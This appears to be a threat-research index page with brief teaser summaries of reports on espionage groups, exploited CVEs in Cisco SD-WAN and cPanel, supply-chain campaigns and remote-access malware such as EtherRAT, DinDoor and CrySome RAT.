Threat Research

Pervasive SSH tunnel activity from 2025 persisted into 2026, targeting Russian and Belarusian entities.The cyberespionage group Cloud Atlas, active since 2014, is behind some of these attacks.Recent investigations revealed new tools and indicators of compromise linked to the group.They have resumed using malicious shortcut archives to launch PowerShell scripts....

Threat actors are actively exploiting multiple vulnerabilities affecting Cisco Catalyst SD-WAN products, including the authentication bypass flaw CVE-2026-20182, which allows remote attackers to gain administrative access without authentication....

Our research examined the April 22 Checkmarx KICS and April 24 elementary-data incidents as part of a broader TeamPCP supply chain campaign involving at least seven confirmed waves. The KICS attack used multichannel poisoning across Docker Hub, VS Code/OpenVSX, and GitHub Actions, later enabling the hijack of @bitwarden/cli through stolen npm tokens....

CVE-2026-41940 is a severe authentication bypass flaw (CVSS score: 9.8) impacting cPanel and WHM. The vulnerability allows remote attackers to circumvent the authentication mechanism and obtain unauthorized access without requiring legitimate credentials....

The EtherRAT malware family was first identified by Sysdig in December 2025, initially exploiting CVE-2025-55182 (React2Shell) on Linux servers. In March 2026, Atos reported a Windows-based EtherRAT campaign with activity traced back to December 2025....

A newly identified set of China-aligned campaigns is targeting government entities and critical infrastructure across South, East, and Southeast Asia, plus one NATO member state. This activity is being tracked as SHADOW-EARTH-053....

The increasing reliance on AI has led to a surge in AI-driven tools. However, these platforms can also be exploited for malicious purposes, as demonstrated in the case of Kuse.ai. While Kuse is generally regarded as a reliable workplace solution, threat actors continuously develop new social engineering tactics....

DinDoor, a malware variant linked to the Tsundere botnet and associated with the Iranian APT group Seedworm(MuddyWater), leverages the Deno runtime to execute obfuscated JavaScript for command-and-control communication and victim fingerprinting. Delivered via MSI installers, it exploits gaps in monitoring for less commonly tracked runtimes....

Void Dokkaebi (Famous Chollima) has advanced from targeted social engineering into a self-spreading supply chain threat. Compromised developer repositories act as infection hubs, propagating malware across the developer ecosystem like a worm. It exploits trusted workflows using malicious VS Code tasks and injected code that runs during normal development....

CrySome RAT represents a modular, userland-focused post-exploitation framework emphasizing persistence, evasion, and operator control(Keylogger, Credential harvesting, RDP, HVNC). While it does not exhibit kernel-level sophistication, its combination of defense evasion techniques and surveillance capabilities makes it effective against poorly monitored environments....